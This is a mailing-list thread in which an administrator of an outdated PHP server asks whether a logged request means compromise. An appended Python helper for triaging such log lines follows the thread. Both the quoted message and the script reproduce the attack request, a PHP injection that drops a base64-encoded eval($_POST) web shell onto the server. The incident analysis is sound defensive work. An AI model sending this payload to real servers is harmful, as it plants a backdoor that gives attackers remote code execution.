Re: am i hacked ?

----- On Feb 6, 2017, at 5:45 PM, Daniel dferradal@xxxxxxxxx wrote:

> Actually now that I re-read the requests it also looks like a successful
> shellshock attempt.
> Operating system software not updated recently either?

> 2017-02-06 17:42 GMT+01:00 Daniel < dferradal@xxxxxxxxx > :

>> Have you tried to send those requests yourself and see what you get?
>> Still those requests seem to be aimed at your php framework.

>> Do you use a very old php version as well?

Everything is old. php, OS, apache. This is to my account. It's a system I nearly oversaw, because we use it very rarely.
But nevertheless, it should be updated. I know. And I learn.

>>> What I found out already:
>>> https://url-encoder.de/ helped me to decode the URL:
>>> /?1=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo
>>> '->|';file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo
>>> '|<-';

>>> Currently I don't understand what this means.
>>> I don't find a file webconfig.txt.php on my system.
>>> Currently no weird process, no new user in /etc/passwd, no packets to the
>>> network which include this ip.

>>> Thankful for any tip.

 

Helmholtz Zentrum Muenchen
Deutsches Forschungszentrum fuer Gesundheit und Umwelt (GmbH)
Ingolstaedter Landstr. 1
85764 Neuherberg
www.helmholtz-muenchen.de
Aufsichtsratsvorsitzende: MinDir'in Baerbel Brumme-Bothe
Geschaeftsfuehrer: Prof. Dr. Guenther Wess, Heinrich Bassler, Dr. Alfons Enhsen
Registergericht: Amtsgericht Muenchen HRB 6466
USt-IdNr: DE 129521671
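
Added example, not part of the original message: a small log-triage helper that URL-decodes a request like the one quoted above, decodes any `base64_decode('...')` literal it carries, extracts the path passed to `file_put_contents`, and optionally checks whether that file exists under a document root. The log lines, addresses and the `triage` function name are constructed for illustration; only the decoded request string comes from the thread.

```python
import base64
import os
import re
from urllib.parse import quote, unquote

# Decoded request as quoted in the thread, with the mail line wrap rejoined.
PAYLOAD = ('@ini_set("display_errors","0");@set_time_limit(0);'
           "@set_magic_quotes_runtime(0);echo '->|';"
           "file_put_contents($_SERVER['DOCUMENT_ROOT'].'/webconfig.txt.php',"
           "base64_decode('PD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+'));echo '|<-';")
# Constructed access-log lines: addresses, timestamps and sizes are made up.
SAMPLE_LOG = [
    '203.0.113.7 - - [06/Feb/2017:10:00:00 +0100] "GET /?1='
    + quote(PAYLOAD, safe='') + ' HTTP/1.1" 200 5',
    '203.0.113.8 - - [06/Feb/2017:10:00:05 +0100] "GET /index.php?id=3 HTTP/1.1" 200 812',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
B64_RE = re.compile(r'''base64_decode\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)''')
WRITE_RE = re.compile(r'file_put_contents\(([^,]+),')
PATH_RE = re.compile(r'''['"](/[^'"]+)['"]''')

def triage(line, docroot=None):
    """URL-decode one access-log line and report what the request tried to do."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    decoded = unquote(m.group(1))
    blobs = []
    for b64 in B64_RE.findall(decoded):
        try:
            blobs.append(base64.b64decode(b64, validate=True).decode('latin-1'))
        except ValueError:  # not valid base64: keep the raw literal for review
            blobs.append(b64)
    # Quoted absolute paths inside the first argument of file_put_contents().
    targets = [p for arg in WRITE_RE.findall(decoded) for p in PATH_RE.findall(arg)]
    # Only meaningful when docroot is given: does the written file exist on disk?
    present = [p for p in targets
               if docroot and os.path.exists(os.path.join(docroot, p.lstrip('/')))]
    return {'request': decoded, 'blobs': blobs, 'targets': targets,
            'present': present, 'suspicious': bool(blobs or targets)}

if __name__ == '__main__':
    for entry in SAMPLE_LOG:
        print(triage(entry))
```

An empty `present` list for a flagged request matches the situation described in the message, where the request was logged but no `webconfig.txt.php` was found on the system.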

